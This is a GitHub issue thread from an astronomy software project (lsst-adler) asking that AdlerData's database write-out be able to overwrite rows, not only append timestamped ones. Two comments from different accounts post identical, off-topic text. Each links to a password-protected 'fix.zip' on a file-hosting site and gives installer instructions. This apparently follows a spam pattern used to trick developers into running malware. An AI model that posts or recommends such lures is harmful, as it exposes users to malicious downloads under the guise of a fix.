### ISSUE TITLE
AdlerData should also be able to overwrite rows on write-out

### ISSUE THREAD

**Issue by astronomerritt** [lsst-uk/lsst-adler#163]
At the moment, AdlerData.write_row_to_database() appends a new timestamped row to a database. This is fine for now, but for the Lasair integration, we probably don't actually want to keep old records, and instead want to overwrite whatever the database entry for that object is.

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
